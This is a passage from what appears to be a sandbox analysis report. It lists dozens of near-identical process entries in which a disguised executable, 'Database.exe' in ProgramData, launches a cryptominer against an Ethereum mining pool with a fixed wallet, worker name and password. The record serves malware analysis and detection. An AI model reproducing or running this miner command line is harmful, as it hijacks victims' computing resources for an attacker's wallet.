    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:5188
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7008
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8892
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    - Loads dropped DLL
    PID:2824
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7180
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9372
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9492
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9588
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9764
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9880
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9980
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10136
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10228
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:1320
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9528
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9872
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7460
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9680
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10172
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7996
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7364
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10608
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10740
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10824
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10948
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:11200
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:512
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9924
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10004
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:4900
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9680
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:5636
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:4784
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9924
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:11404
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:11700
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:12008
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:12248
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:5532
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:11584
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:4728
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:392
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7632
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:1072
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:3260
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:12064
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7152
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7676
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:11796
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:11072
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10192
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8352
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8028
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:4384
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:976
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:4348
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10360
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:12656
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13260
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:12768
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13188
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13204
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13232
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13508
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13740
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13972
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:14188
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10884
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13740
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:14332
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13488
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8756
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8224
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8784
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:14656
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:14976
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:15240
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:14400
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:15296
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:5796
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:10992
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9012
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13956
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:15580
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:15796
- - C:\ProgramData\Data\Database.exe
